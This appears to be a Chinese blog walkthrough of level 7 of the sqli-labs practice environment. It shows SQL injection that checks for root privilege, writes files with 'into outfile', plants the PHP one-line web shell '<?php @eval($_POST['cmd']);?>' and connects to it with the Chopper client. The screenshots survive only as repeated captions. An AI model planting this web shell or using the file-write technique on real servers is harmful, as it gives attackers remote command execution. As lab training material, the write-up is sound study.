开始挑战第一关(Error Based- String)

开始之前,先介绍这关需要用到的几个函数,如下图

SQL注入之Sqli-labs系列第七篇(基于root权限读写注入)

继续访问我们的地址,输入' “ 一些测试语句发现都没有反应

SQL注入之Sqli-labs系列第七篇(基于root权限读写注入)

 

查看源码,是采用了单引号和双括号

SQL注入之Sqli-labs系列第七篇(基于root权限读写注入)

这样一来就好办了,就直接利用我们的闭合来测试

SQL注入之Sqli-labs系列第七篇(基于root权限读写注入)

SQL注入之Sqli-labs系列第七篇(基于root权限读写注入)

继续使用order by猜解字段名,正确的数据是3个

  SQL注入之Sqli-labs系列第七篇(基于root权限读写注入)

 上union  select联合查询

SQL注入之Sqli-labs系列第七篇(基于root权限读写注入)

 

靠,又没有报错,那就只能使用上面的函数来进行了,

先判断下权限  and (select count(*) from mysql.user)>0,为什么是mysql.user表,因为所有的用户都是存在mysql.user中的,返回正确

SQL注入之Sqli-labs系列第七篇(基于root权限读写注入)

利用 into   outfile导出文件到一个txt文件中 ,使用outfile需要root权限,并且需要绝对路径,这里我是采用的本地搭建,就直接利用本地的路径了(这里为什么会提示sql语法错误,研究了很久,是出现在环境上,我是自己安装的apache和msyql)

SQL注入之Sqli-labs系列第七篇(基于root权限读写注入)

 

查看是否写入成功,发现已成功

SQL注入之Sqli-labs系列第七篇(基于root权限读写注入)

 

写入一句话进去<?php @eval($_POST['cmd']);?>成jpg图片,将一句话转换成16进制

 SQL注入之Sqli-labs系列第七篇(基于root权限读写注入)

 

SQL注入之Sqli-labs系列第七篇(基于root权限读写注入)

 

 

  然后再使用load_file加载成php

 SQL注入之Sqli-labs系列第七篇(基于root权限读写注入)

 

菜刀成功链接

SQL注入之Sqli-labs系列第七篇(基于root权限读写注入)

 

相关文章:

  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-09-30
  • 2022-12-23
  • 2022-12-23
  • 2021-12-30
  • 2021-12-27
猜你喜欢
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-08-11
  • 2022-12-23
  • 2022-01-31
  • 2022-12-23
相关资源
相似解决方案